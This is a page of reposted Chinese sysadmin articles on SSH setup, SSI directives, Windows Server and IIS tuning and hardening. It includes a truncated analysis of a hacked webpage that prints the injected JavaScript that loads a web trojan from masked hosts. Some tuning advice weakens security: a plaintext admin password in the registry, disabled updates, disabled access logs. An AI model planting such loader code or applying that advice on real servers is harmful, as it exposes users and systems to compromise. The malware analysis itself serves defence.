安装好了CentOS 6.2,我想让它作为一个服务器,可以让我的Windows 7电脑远程登录。 安装OpenSSH Server 首先,我们搜索一下CentOS的软件库里面有没有已经定义好的SSH服务器包:
|
1 |
$ yum search <span style="color:#0000FF;">ssh<br />... ...</span><span style="color:#000000;">openssh.x86_64 : An open source implementation of SSH protocol versions </span><span style="color:#800080;">1</span> and <span style="color:#800080;">2</span><span style="color:#000000;">openssh</span>-askpass.x86_64 : A passphrase <span style="color:#0000FF;">dialog</span><span style="color:#0000FF;">for</span><span style="color:#000000;"> OpenSSH and Xopenssh</span>-<span style="color:#000000;">clients.x86_64 : An open source SSH client applicationsopenssh</span>-ldap.x86_64 : A LDAP support <span style="color:#0000FF;">for</span><span style="color:#000000;"> open source SSH server daemonopenssh</span>-server.x86_64 : An open source SSH server daemon<br />... ... |
OpenSSH是Secure Shell的一个开源实现。从上面的搜索结果可以看到,CentOS的软件库里面已经有了OpenSSH的服务器包(openssh-server)和客户端包(openssh-clients),用yum install可以直接安装。
|
1 |
$ yum <span style="color:#0000FF;">install</span> openssh-server |
OpenSSH Server安装完成后在/etc/init.d目录下应该会增加一个名为sshd的服务。可以参考《CentOS设置服务开机自动启动》的方式配置sshd服务开机自动启动。
|
1 |
$ chkconfig --<span style="color:#000000;">list sshdsshd </span><span style="color:#800080;">0</span>:off <span style="color:#800080;">1</span>:off <span style="color:#800080;">2</span>:on <span style="color:#800080;">3</span>:on <span style="color:#800080;">4</span>:on <span style="color:#800080;">5</span>:on <span style="color:#800080;">6</span>:off |
手动启动sshd服务,方便后面客户端的连接:
|
1 |
$ /etc/init.d/sshd start |
用密码方式登录远程服务器 WIndows 7里面的SSH客户端软件我用的是XShell。打开XShell,新建连接,选择Password验证方式,输入用户名和密码,这样就可以连接到服务器了。 登录成功后的画面: 用RSA密钥登录远程服务器 OpenSSH允许使用RSA的方式登录服务器。RSA加密方式会有两个文件:一个是公钥文件,放在服务器$HOME/.ssh/authorized_keys文件里面;另外一个是私钥文件,放在客户端电脑上。 产生RSA密钥对,可以在服务器产生,也可以在客户端产生:
|
1 |
$ <span style="color:#0000FF;">ssh-keygen</span> |
执行完毕后,会在$HOME/.ssh目录下多出来两个文件:id_rsa.pub(公钥文件)和id_rsa(私钥文件)。 将公钥文件追加到$HOME/.ssh/authorized_keys文件后面:
|
1 |
$ <span style="color:#0000FF;">cat</span> id_rsa.pub >> authorized_keys |
将私钥文件下载到客户端电脑(可以使用SFTP方式,例如XFtp,WinSCP等很多软件),然后新建XShell连接,选择Public Key验证方式: 配置完毕,现在我们可以不用输入密码也能够连接到服务器了。 OpenSSH相关目录和文件 所有配置信息保存的目录:/etc/ssh sshd服务配置文件:/etc/ssh/sshd_config OpenSSH相关链接 《用OpenSSH构建SSH服务器》:安装O盆SSH服务器。 《用SSH客户端软件登录到服务器》:如何用PUTTY+RSA登陆远程服务器。 《CentOS Wiki – 保卫 OpenSSH》:OpenSSH的安全设置。 《Top 20 OpenSSH Server Best Security Practices》:20个需要遵守的SSH安全建议。 转自:http://www.cnblogs.com/eastson/archive/2012/06/29/2570163.html
View DetailsMime-Typ Dateiendung(en) Bedeutung application/acad *.dwg AutoCAD-Dateien (nach NCSA) application/applefile AppleFile-Dateien application/astound *.asd *.asn Astound-Dateien application/dsptype *.tsp TSP-Dateien application/dxf *.dxf AutoCAD-Dateien (nach CERN) application/futuresplash *.spl Flash Futuresplash-Dateien application/gzip *.gz GNU Zip-Dateien application/listenup *.ptlk Listenup-Dateien application/mac-binhex40 *.hqx Macintosh Binär-Dateien application/mbedlet *.mbd Mbedlet-Dateien application/mif *.mif FrameMaker Interchange Format Dateien application/msexcel *.xls *.xla Microsoft Excel Dateien application/mshelp *.hlp *.chm Microsoft Windows Hilfe Dateien application/mspowerpoint *.ppt *.ppz *.pps *.pot Microsoft Powerpoint Dateien application/msword *.doc *.dot Microsoft Word Dateien application/octet-stream *.bin *.exe *.com *.dll *.class Ausführbare Dateien application/oda *.oda Oda-Dateien application/pdf *.pdf Adobe […]
View Details首先备windows server 2008 r2镜像一个,PE程序(我用的是win2003 的pe光盘版,大家可以用U盘版的),32位bootsect.exe文件 1、解压windows到文件夹中(暂定windows文件夹吧),随便解压到除C盘外的盘符中 2、用winpe启动计算机,格式化C盘(因为我要把系统装在C盘里)。 3、将安装文件夹根目录的boot文件夹和bootmgr文件复制到C盘,在c盘中新建文件夹sources,将安装文件夹中sources文件夹中的boot.wim复制到新建的文件夹中,替换bootsect.exe(我用的是win7 32位 里的)文件(在boot文件夹中) 4、运行cmd 执行C:\boot\bootsect.exe /nt60 c: 5、再用刚才解压的64位的bootsect.exe覆盖掉32位的。 6、重新启动(硬盘启动)。 7、这时候你可以看到win7的启动界面和安装界面了,选择修复,选第一项,下一步,选择命令行。 8、输入c:回车del bootmgrdel bootdel sources(这些以后格式化也可)9、用命令行的方式进入解压的windows文件夹下的sources文件夹,输入setup.exe,OK到此为止现在windows就开始安装了。 转自:http://www.cnblogs.com/wenwuxianren/archive/2011/03/19/1988809.html
View Details服务器端包含的指令和使用程序本节介绍IIS 5.0服务器端包含的指令的语法和参数值。还介绍IISRESTART实用程序的语法和使用,该实用程序可用来从远程计算机、命令行和SSI指令的内部管理Web服务器。 1. SSI指令、属性和标记指令 说明#include 将指定的文件内容插入到被发送到客户机的响应流中,并替换该指令。例如:<!-- #include file=”userfilbits.inc”à#config 指定用于日期、时间和文件尺寸的格式,以及返回客户机的通用SSI错误消息的文本格式。例如:<!—#config ERRMSG=”SSI Processing Error”à<!—#config TIMEFMT=”%A, %B, %d, %Y, %H:%M:%S ”à<!—#config SIZEFMT=”BYTES”à参见下文中关于用于该指令的属性和标记的列表#echo 将HTTP环境变量插入到发送给客户机的相应流中,并替换该指令。例如:<!--#echo VAR-“SERVER_NAME”à参见下文中关于用于该指令的属性和标记的列表#exec 在服务器上执行一个程序或shell命令。例如:<!--#execCGI=”/scripts/myapp.exe?value1=this&value2=that”à<!--#exec CMD=”cmd.exe /c iisrestart /stop”à<!--#exec CMD=”cmd.exe /c net start cisvc”à参加下文中关于该指令的属性和标记列表。必须添加以下条目到Windows Registry中才可以使用CMD属性:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/W3SVC/Parameters/SSIEnableCmdDirective将该值设置为1并重新启动WWW服务,CMD属性才被允许用于#exec指令。将其设置为0则禁止它并防止未验证的使用,否则将会破坏服务器的安装。#flastmod 将指定文件的最新更改的日期和时间插入到要发送客户机的响应流中。例如:<!--#flastmod file=”default.asp”à参见下文中关于该指令的属性和标记的列表。#fsize 将指定文件的尺寸插入到要发送给客户机的响应流中。例如:<!--#fsize file=”default.asp”à参见下文中关于该指令的属性和标记的列表。2. #exec指令的命令类型属性属性 说明CGI 在Web服务器上下文中执行指定的应用(即通过ISAPI对请求和响应的访问),并将任何查询串的值传递到应用中。该应用与Web服务器运行在不同的内存中CMD 启动指定的操作系统命令的解释程序的一个实例,并执行该指令的命令3. #cinlcude、#flastmod和#fsiaze的路径类型属性属性 说明FILE 该属性的值是绝对和相对路径加上文件名,就像在DOS命令提示中所使用的,如“/files/web/myfile.txt”VIRTUAL 该属性值是绝对路径和相对路径加上文件名,与当前的Web站点的根文件夹相关。如“/file/web/myfile.txt”4. #config指令的SIZEFMT标记标记 说明BYTES 文件大小将以字节返回ABBEV 文件大小将以计算并以最近的千字节(KB)数返回5. #config指令的TIMEFMT标记标记 说明%a 一周的日子按”Mon”、”Tue”等表示%A 一周的日子按”Monday”、”Tuesday”等表示%b 月份名按”Jan”、”Feb”等表示%B 月份名按”January”、”February”等表示%c 与服务器的地区相对应的当前的日期和时间格式(如11/06/99 12:51:32)%d 一月的日子按数表示(01到31)%H 用24小时格式表示当前时间(00到23)%I 用12小时格式表示当前时间(01到12)%j 按数字(001到366)表示一年的日子%m 月份按数字表示(01到12)%M 当前分钟按数字表示(00到59)%p 按服务器地区表示相应的“上午”或“下午”文字如(AM或PM)%S 当前的秒按数字表示(00到59)%U 一年的每周按数字表示(00到51),并且每周的第一天为Sunday%w 一周每天按数字表示(0到6),并且每周的第一天为Sunday%W 一年的没有数字表示(00到51),并且每周的第一天为Monday%x 当前的日期格式对应于服务器地区表示的(如11/06/99)%X 当前时间格式相应与服务器地区表示的(12:51:32)%y 没有世纪表示的年数(如01)%Y 有世纪表示的年数(如2001)%z,%Z 服务器时间带的名字或缩写(如果知道的话)%% 百分号字符6. #echo指令的VAR标记标记 说明AUTH_TYPE 客户机用来验证网页是否拒绝匿名访问的验证类 型,如“Basic”或“NTLM”(即,询问/响应)AYTH_PASSWORD 由用户向服务器提供的口令,如果该页拒绝匿名访问并且客户机使用Basic方法验证的话AUTH_USER 由用户向服务器提供的用户名,如果在NTLM和Basic(或其他)方法下该页拒绝匿名访问的话CONTENT_LENGTH 在请求体中发送的字节数,即,作为POST向服务器发送的字节数CONTENT_TYPE 作为POST在请求体中发送的数据MIME类型DOCUMENT_NAME 由客户机请求的文档的全实际路径和文件名DOCUMENT_URT 由客户机请求的文档的全虚拟路径和文件名DATE_GMT 服务器操作系统中的日期和时间设置,不带任何Greenwich Mean Time的调节DATE_LOCAL Greenwich Mean […]
View DetailsBasic SSI directives Syntax
|
1 |
<!--#element attribute=value attribute=value ... --> |
Today’s date
|
1 |
<!--#config timefmt="%Y/%m/%d %a %H:%M:%S" -->Today is <!--#echo var="DATE_LOCAL" --> |
Modification date of the file
|
1 |
This document last modified <!--#flastmod file="index.html" --> |
Including the results of a CGI program
|
1 |
<!--#include virtual="/cgi-bin/counter.pl" --><!--#include virtual="/cgi-bin/example.cgi?argument=value" --> |
You can use "#exec cgi=" directive, but it can be disabled using the IncludesNOEXEC Option. Including a standard footer
|
1 |
<!--#include virtual="/footer.html" --> |
Executing commands
|
1 |
<!--#exec cmd="ls" --> |
This feature is dangerous. You can allow SSI, but not the exec feature, with the IncludesNOEXEC argument to the Options directive. Setting variables
|
1 |
<!--#set var="modified" value="$LAST_MODIFIED" --><!--#set var="date" value="${DATE_LOCAL}_${DATE_GMT}" --> |
Conditional expressions
|
1 |
<!--#if expr="test_condition" --><!--#elif expr="test_condition" --><!--#else --><!--#endif --> |
View Details
Red5不能启动,删除这两个文件却可以,不理解: com.springsource.slf4j.juli-1.6.1.jarcom.springsource.slf4j.log4j-1.6.1.jar
View Details一,、陷入毒窝 我们在Google中搜索资料的时候,经常会看到这样的搜索结果“该网站可能含有恶意软件,有可能会危害您的电脑。”或者“继续访问 http://www.*.com,但风险自担。”这是Google以自己的方式对网页安全性分析的结果。我们没有理由怀疑Google的技术,这是它在以自己的方式告诉我们“这是个毒窝”。以“不入虎穴,焉得虎子”的英勇,我们就去探探虎穴。 测试环境说明:一安装有Windows XP的虚拟机,没有打补丁包,没有安装杀毒软件和防火墙。 1.探毒 第一步:下载网页(为了不至于“出师未捷,而光荣牺牲。”我先把挂马的网页下载下来。看看到底用了什么网马,怎么挂的?)用迅雷很快地把挂了马的网页下载下来。 第二步:分析网页代码 用记事本打开网页查看源代码,通过分析,发现挂马者在该网站的首页的开头和尾部都加入了如下的代码: <SCRIPT language=javascript> window.open ("http://www.*.com/1.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 这是一个用javascript脚本木马的代码,其中的http://www.*.com/1.htm应该是网页木马的地址。 第三步:继续用迅雷下载http://www.*.com/1.htm,用记事本打开,代码如下: <script language=javascript src="http://my.*.com/admin.js>"; </script> 这是一个木马脚本,通过脚本调用了一个js文件。第四步:用迅雷下载admin.js文件,用记事本打开,部分代码如下: eval(function(p,a,c,k,e,d){e=function(c){return(c http://net.zdnet.com.cn/network_security_zone/2007/1225/690486.shtml
View Details一、优化启动设置 1.禁用关机事件跟踪开始-运行-gpedit.msc-计算机配置-管理模板-系统-显示关机事件跟踪-禁用。 2. 禁用开机 CTRL+ALT+DEL和实现自动登陆方法1:打开注册表:HKEY_LOCAL_MACHIN|SOFTWARE|MicroSoft|Windows NT|CurrentVersion |Winlogon段,在此项按右键,新建二个字符串值,AutoAdminLogon=1, DefaultPassword=“为超级用户Administrator所设置的Password”。 注意,一定要为Administrator设置一个密码,否则不能实现自启动。 然后,重新启?疻indows即可实现自动登录。 方法2:管理工具-本地安全策略-本地策略-安全选项-interactive logon: Do not require CTRL+ALT+DEL,启用之。 方法3(自动登陆):使用Windows XP的Tweak UI来实现Server 2003自动登陆。下载weak UI http://www.ssite.org/uppic/sun_pic/…003/tweakui.exe下载后直接执行weakui.exe 在左边的面板中选择Logon-Autologon-在右边勾写),点击下面set Password,输入用户名的密码,然后点击OK。 3.我的电脑-属性-高级-启动和故障修复,点错误报告,选择“禁用错误汇报、但在发生严重错误时通知我”; 4.去掉将事件写入系统日志、发送管理警报、自动重新启动等选项,将写入调试信息设置为无; 5.点击编辑,在弹出记事本文件中: [Operating Systems] timeout=30 //把缺省时间 30 秒改为 0 秒 multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows server 2003rofessional" /fastdetect //把缺省 fastdetect 改为 nodetect 二、关闭华医生Dr.Watson 在开始-运行中输入“drwtsn32”,或者开始-程序-附件-系统工具-系统信息-工具-Dr Watson,调出系统里的华医生Dr.Watson ,只保留“转储全部线程上下文”选项,否则一旦程序出错,硬盘会读很久,并占用大量空间。如果以前有此情况,请查找user.dmp文件,删除后可节省几十MB空间。 三、用SFC命令释放更多空间 若确认系统不会新加设备,可把\windows\system\dellcache目录内的文件予以删除,以释放空间。 删除全部文件的命令是sfc.exe/purgecache,约300MB,本操作有危险性,对系统不熟悉者勿用。 四、视觉效果 1.我的电脑-属性-高级-性能-设置-视觉效果,选择“调整为最佳性能”; 2.我的电脑-属性-高级-性能-设置-高级,在处理器计划选择程序,内存使用选程序,这样系统会给前台程序更多资源,使之运行更快; 3.虚拟内存中点更改,256M以下内存将虚拟内存值设为物理内存的1.5倍,将初始大小和最大值设为一样,将虚拟内存设置在系统盘外。比如你的内存是256M,你可以设置为384,操作系统安装在C盘,设置内存在E盘或F盘,先点C,再点无分页文件,然后点设置,接着点E,自定义大小,更改后点“设置”才能生效。 4.打开注册表,HKEY_CURRENT_USER\Control Panel\Desktop分支,在右边窗口双击键值名MenuShowDelay,这一项的取值范围是0~100000(单位为毫秒),将默认的值改为0。 五、删除一些可不用的东西 1.删除驱动器备份 \windows\Driver cache\i386下的Driver.cab文件,约70MB。 2.删除帮助文件 \Windows\Help下,约40MB 3.删除备用DLL文件 \Windows\System32\Dllcache,约200MB.最好有安装光盘或安装文件备份,以备用。 4.删除不用的输入法 Windows\Ime,如日文,韩文,繁体中文输入法。 5.将C:\windows\temp中的文件全部删除。 六、关闭部分功能 1.关闭系统还原功能 我的电脑-属性-系统还原,选在所有的驱动器上关闭系统还原。也可关闭不重要的分区的系统还原,如果考虑系统安全,则不要关闭还原功能。 2.关闭自动更新 我的电脑-属性-自动更新,选择关闭自动更新,我将手动更新计算机。 3.关闭远程桌面 我的电脑-属性-远程,远程桌面里的允许用户远程连接到这台计算机勾去掉。 4.取消休眠功能 右键桌面-属性-屏幕保护程序-电源-休眠,将启用休眠前的勾去掉,约200MB。 七、其它优化设置 1. 将我的文档转到其他分区 在桌面的“我的文档”图标上右击鼠标,选择属性-移动,目标为F:\我的文档。 2. 将IE临时文件夹转到其他分区。 3.在任务栏中点击鼠标右键,选择属性,任务栏标签中去掉分组相似任务栏按钮前的勾。 4查看驱动器组件信息 右键我的电脑-管理存储-可移动存储-库,用右键点击所要查询的驱动器-属性-设备信息就可看到驱动器的信息了,将多余的用户名删除。 八、设置硬盘工作模式 我的电脑-属性-硬件-设备管理器-IDE […]
View DetailsWindows Server自带的互联网信息服务器IIS是架设网站服务器的常用工具,它是一个既简单而又麻烦的东西,新手都可以使用IIS架设一个像模像样的Web站点来,但配置、优化IIS的性能,使得网站访问性能达到最优状态却不是一件简单的事情,这里我就介绍一下如何一步一步的优化你的IIS服务器。 服务器端环境,我们以Windows Server 2003的IIS6.0为例,客户端环境为Mozilla Firefox 3.0,同时安装Yahoo的YSlow扩展。 YSlow是Yahoo开发者团队发布的一款基于Firebug的插件。用于分析网页,并根据一些高性能网站的规则进行相应的评级打分,对于网页性能优化有很好的帮助作用,告诉你那些部分影响了你的网页速度,并告诉你如何基于某些规则而进行优化。我们对于IIS的优化策略就是基于YSlow的。 使用安装了YSlow的Firefox打开目标网站,然后点击YSlow图标,点击Performance,如下图所示。 其中Performance Grade为YSlow对你网站的评级,A(100分)为最高,F为最低,后面列出如何进行修改,下面我以IIS 6.0为例介绍一下如何进行优化网站性能。 1、减少HTTP请求数量 这主要是修改网站代码,减少外部图片、CSS、JS等文件数量,手动合并多个CSS/JavaScript文件。IIS那里不用设置。 2、使用CDN 对于小网站来说,这个就免了吧。当然有钱人可以试试,可以从技术上解决用户访问网站响应速度慢的问题。 3、启用内容过期 对于静态文件启用内容过期可以提高访问性能。首先网站的目录要划分合理,图片、CSS、JavaScript均放在单独目录下,然后在IIS中选择目录,点属性-HTTP头,启用内容过期,可以选择30天后过去,这样,用户浏览器将比较当前日期和截止日期,以便决定是显示缓存页还是从服务器请求更新的页,由于图片、CSS、JS通常变化较少,因此基本上都从本地缓存读取,从而加快显示速度。 4、启用Gzip压缩 HTTP压缩是在Web服务器和浏览器间传输压缩文本内容的方法。HTTP压缩采用通用的压缩算法如Gzip等压缩HTML、JavaScript或 CSS文件。压缩的最大好处就是降低了网络传输的数据量,从而提高客户端浏览器的访问速度。 使用方法是,右击“网站”->“属性”,选择“服务”。在“HTTP压缩”框中选中“压缩静态文件”,“临时目录”建议单独设置另一个盘的目录下。 之后,IIS管理器中,右击“Web服务扩展”->“增加一个新的Web服务扩展”,在“扩展名”中输入“HTTPCompression”,添加“要求的文件”为C:\WINDOWS\system32\inetsrv\gzip.dll,其中Windows系统目录根据您的安装可能有所不同,选中“设置扩展状态为允许”。 最后,使用文本编辑器打开C:\Windows\System32\inetsrv\MetaBase.xml,在HcFileExtensions中增加需要压缩的静态文件后缀名,默认为HTML和TXT文件,建议再添加上js、css等,不要添加图片或ZIP等已经被压缩的文件。 5、将样式文件放在头部 这是基本的HTML代码风格,将所有的CSS文件都放在HTML页面的头部。 6、将脚本文件放在尾部 这也是基本的HTML代码风格,将所有的JavaScript文件都放在HTML页面的尾部。 7、避免CSS表达式 这点很简单,因为大多数人从来不用CSS表达式。 8、使用外部的JavaScript和CSS 将所有的JavaScript和CSS都做成外部文件的形式进行引用,这主要是为了让这些文件可以被浏览器缓存起来,参见第三点的介绍。 9、减少DNS查询 域名的DNS查询会带来额外的访问开销,减少页面内文件的主机域名数量,一个页面的主机域名保持在2-4个以内,这样就不会降低页面的装入速度。 10、压缩JavaScript文件 压缩脚本文件,删除不必要的字符,可以改善加载时间,目前有很多JavaScript文件的压缩工具,我这里有一个GUI界面的JS压缩工具供下载。 11、避免重定向 网页的重定向会带来额外的运行开销,因此要避免页面进行重定向跳转操作。 12、删除重复脚本 一个页面两次包含同一个JavaScript文件会影响加载的性能,因此需要将重复的脚本文件删除。 13、配置ETag 这是一个令人迷惑的问题。理论上说将服务器的ETag删除会提高HTTP请求的性能,但是按照微软官方提供的修改方法配置IIS 6.0,并没有实际效果,最终我使用了一个第三方的DLL文件,以ISAPI的方式实现了删除ETag的功能。 经过上面这些网站前端重构和WEB服务器的配置修改,我们的页面结构就变得更加规范,重构的页面大多都会取得不错的YSlow的评分,总体来说性能提升了不少。对于最终用户来说,也会明显感受到访问网站速度变快了很多,网站的浏览体验得到了较好的提升。 from http://www.w-link.org.cn/post/46.html
View Details1、禁止多余的Web服务扩展 IIS6.0支持多种服务扩展,有些管理员偷懒或者不求甚解,担心Web运行中出现解析错误,索性在建站时开启了所有的Web服务扩展。殊不知,这其中的有些扩展比如“所有未知CGI扩展”、“在服务器端的包含文件”等是Web运行中根本用不到的,况且还占用IIS资源影响性能拖垮Web,甚至某些扩展存在漏洞容易被攻击者利用。因此,科学的原则是,用到什么扩展就启用什么扩展。 如果企业站点是静态页面,那什么扩展都不要开启。不过现在的企业站点都是交互的动态页面比如asp、php、jsp等。如果是asp页面,那只需开启“Active Server Pages”即可。对于php、jsp等动态页面IIS6.0默认是不支持的需要进行安装相应组件实现对这些扩展的支持。不过,此时用不到的扩展完全可以禁用。 禁止Web服务扩展的操作非常简单,打开“IIS管理器”,在左窗格中点击“Web服务扩展”,在右侧选择相应的扩展,然后点击“禁用”即可。(图1) 2、删除不必要的IIS扩展名映射 IIS默认支持.asp、.cdx等8种扩展名的映射,这其中除了.asp之外其他的扩展几乎用不到。这些用不着的扩展会加重web服务器的负担,而且带来一定的安全隐患。比如.asa,.cer等扩展名,就可以被攻击者利用来获得webshell。因为一般的asp系统都会限制asp文件的上传,但如果没有限制.asa或者.cer等扩展名,攻击者就可以更改文件后缀突破上传限制,运行.asa或者.cer的文件获得webshell。(图 2) 删除IIS扩展名的操作是:打开IIS管理器,右键单击“默认Web站点”选择“属性”,点击“主目录”选项卡,然后点击“配置”打开应用程序窗口,最后根据自己的需要选择不必要的应用程序映射比如.shtml, .shtm, .stm等,然后点击“删除”即可。(图3) 3、取消访问记录 IIS6.0默认开启对于web的访问记录。当开启记录功能后,IIS会事无巨细地忠实记录所有的web访问记录。这些记录文件的内容是非常庞杂的,比如访问时间、客户端IP、从哪个链接访问、 Cookies等,另外还包括 Method(方法), UserAgent(用户代理)等。这些记录不但占用大量的磁盘空间还大大地影响了web服务器的性能。有人做过评测,停止访问记录可以提升5%到8%的 web性能。而且这些记录对于一般用户,特别是中小型的Web站点没有什么用途,简直太耗费系统性能了,因此建议关闭它。 取消访问记录的操作是:打开IIS管理器,定位到具体的web站点,右键点击选择“属性”,在“主目录”选项卡下取消对“记录访问”的勾选即可。(图4) 4、对访问流量进行限制 默认情况下IIS 6.0对于访问量是没有限制的,如果并发连接过大超过了Web的负载轻则发生网络拥塞,重则导致服务器宕机。因此需要对用户的访问进行限制,控制Web访问的流量。 打开“Internet信息服务”管理器,在其窗口右侧点击主机名前面的“+”号,依次定位到某个Web站点上。选中该Web站点右键单击选择 “属性”,在打开的属性设置窗口中选中“性能”标签,将“启用带宽限制”复选框选中,在随后被激活的“最大网络使用”设置框中,指定你的网络站点带宽的具体数值。大家可以根据服务器的性能及其访问量综合考虑继续设置。对于一般的企业站点将带宽流量设置为1500kb/s就差不多了。同时在“网站连接”下可以进行连接限制的设置,大家可以根据情况设置一个数值。完成以上设置后,IIS就只能使用其被授予的资源进行Web服务,杜绝了异常情况造成的服务器过载,为Web减负。(图5) 5、让Web负载自由伸缩 默认情况下IIS是全负荷地为Web提供服务的,这在一定程度上加重了Web负担。如何能够自动地根据负载变化自动调节工作进程呢? 利用IIS 6.0的Web园,我们只需指定用于某个应用程序池的工作进程的数量就可以了实现各个Web站点之间的隔离。具体的配置步骤是:在“Internet信息服务”管理器中打开应用程序池的“属性”对话框,转到“性能”页,在“Web园”下面的“最大工作进程数”输入框中输入进程数量。当服务器的负载较小,不需要额外的工作进程时,IIS 6.0在一定的时间后(默认20分钟,可配置)自动缩减实际的工作进程数量;如果负载变大,需要额外的工作进程,IIS 6.0再次增加工作进程数量。另外,还可以“启用CUP监视”,设置“最大CPU使用率”,“刷新CUP使用率值”以及“CPU使用率超过最大使用率是执行的操作”,这些设置可以根据需要进行设置。当一切设置完成后这一切就交给IIS自动进行,不需要管理员干预。 (图6) 6、配置应用呈现池 IIS可以支持多个Web服务,特别是虚拟主机一台服务器上有非常多的Web站点。如何才能做到各个站点之间相互独立,不因某些Web站点出现故障而影响其他站点呢?为不同工作进程指定应用程序池是个很好的解决办法。 (1)、创建 打开“IIS 管理器”中,展开本地计算机,右键单击“应用程序池”,选择“新建→应用程序池”。在“应用程序池名称”框中,输入新的应用程序池名称。如果点选选“将现有应用程序池作为模板”,可以在“应用程序池名称”下来列表中选择相应的应用程序池,最后单击“确定”即可。 (图7) (2)、指派 在“IIS 管理器中”,右键单击你要为其指派应用程序池的站点然后单击“属性”。在该站点的属性面板中“主目录”选项卡,在“应用程序池”下拉列表中选择刚才创建的应用程序池即可。如果所有的选项为灰色,单击“创建”按钮就可以输入“应用程序名”,然后在“应用程序池”列表框中,选择并指派网站的应用程序池了。(图 8) (3)、回收 利用“回收”功能,可是设置如何恢复系统资源进行IIS资源使用的灵活定制。打开“IIS 管理控制台”,单击“+”号依次“展开本地计算机→应用程序池”。选择你要回收的应用程序池右键单击选择“属性”,出现应用程序池的属性对话框,单击“回收”选项卡在其下可以设置“进程回收”、“内存回收”等,所有这些设置大家根据实际需要进行设置。(图9) 总结:通过上述IIS优化措施,Web服务器就能轻装上阵其性能将会有较大的提升。当然,要从根本上改善Web性能,仅仅进行软设置是不够的。另外,还需要进行硬件改造,软硬结合才是最完美的解决方案。 管理互联网信息服务器(Internet Information Server,IIS)大家都知道,它是一个既简单而又麻烦的东西,简单的是安装它几乎不需要费什么脑筋,选择一下路径,然后一路按“下一步”就可以完成;配置也比较简单,只要有一定的NT和网络知识,照着说明书就可以架设一个像模像样的Web站点出来。然而管理IIS却没有想像的那样简单。使用一段时间以后,管理员往往会遇上服务器性能不良的情况。这时候,IIS的性能优化,就尤为重要了。 导致IIS服务性能不良的原因有两个方面。一个是人为的,也就是说管理员在安装、配置IIS的时候没有进行优化或者配置错误。另一个则是客观上的,随着运行的服务种类,以及访问人数的增加,服务器原有的硬件配置已不能满足要求了,这就需要提高硬件配置。 在服务器配置上优化IIS性能 1.IIS高速缓存是对IIS进行优化时要考虑的最重要的项目之一。服务器保留了一部分内存空间用作IIS高速缓存,为将来的请求存储对象,这样IIS就可从高速缓存中检索对象而不用从硬盘中检索。 调整IIS高速缓存的容量需要修改注册表,表项如下: \HKEY_LOCAL_MACHINE \System \CurrentControlSet \Services \InetInfo \Parameters \MemoryCacheSize MemoryCacheSize的范围是从0道4GB,缺省值为3072000(3MB)。 IIS通过高速缓存系统句柄、目录列表以及其他常用数据的值来提高系统的性能。这个参数指明了分配给高速缓存的内存大小。如果该值为0,那就意味着 “不进行任何高速缓存”。在这种情况下系统的性能可能会降低。如果你的服务器网络通讯繁忙,并且有足够的内存空间,可以考虑增大该值。必须注意的是修改注册表后,需要重新启动才能使新值生效。 2.使IIS使用处理器时间最长。服务器的CPU处理器能力总是有限的。哪一个应用程序占用处理器的时间最长,谁的性能就能得到最大的提高。 (1)在NT的控制面板中,双击系统图标。 (2)单击性能标签。 (3)在应用程序性能下将游标拖到None的位置,这样就可以使所有正在运行的服务,包括IIS,使用处理器的时间达到最大值。 3.服务器属性设置。在服务器属性里有一项可以使网络应用程序的总处理能力最大的选项,你当然应该选择它。 (1)在桌面上右键单击网络邻居图标,然后选择属性选项。 (2)单击“服务标签”。 (3)单击“服务器”,然后按“属性”。 (4)选择最大化网络应用程序的总处理能力。然后单击“OK。” 提高硬件配置来优化IIS性能 […]
View Details